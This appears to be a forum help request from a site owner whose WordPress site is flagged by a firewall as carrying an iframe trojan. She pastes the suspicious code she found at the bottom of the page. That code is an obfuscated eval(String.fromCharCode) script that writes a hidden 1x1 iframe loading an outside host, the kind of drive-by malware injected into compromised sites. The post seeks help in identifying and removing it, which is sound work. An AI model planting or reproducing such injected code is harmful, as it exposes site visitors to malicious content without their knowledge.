Anyone recognise this, some kind of script code?
Please bear with me as this is slightly above my expertise level.
A client of mine can't get into her WP dashboard or site because her Firewall showed a HEUR:Trojan.Script.Iframer error, I have been seeing what I kind find out about it and if I can help her or not (its looking like I will have to tell her to go to her host for help on this one). But before I do that, I have been deactivating plugins and changing themes and then viewing the source code.
From research I have done it looks like this might be a false positive but I am not sure. The only think I know of that is using an iframe is a recent "All Posters" advert we put on there. So I have got rid of that..
Before getting rid of it, this was at the bottom of the page via viewing the source code:
</div> <script type="text/javascript">eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,98,105,116,115,34,59,118,97,114,32, 119,61,34,105,110,102,111,34,59,118,97,114,32,114,101,54,61,34,119,97,114,101,46,34,59,118,97,114,32,114,114,116,116,54,61,34,110,101,116,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,61,48,49,48,48,48,49,48,49,48,48,49,49))</script>
Does anyone recognise what this might be?
And do you have any other suggestions, advise?
Thanks so much
Sue
PS I tried putting in a line break in the above code to stop the posting area being too wide, there is no line break in the original code
Find me on Pinterest: PINTEREST
You're welcome to follow me on Twitter - affiliatetips and Johnr_Collins
Find me on Pinterest: PINTEREST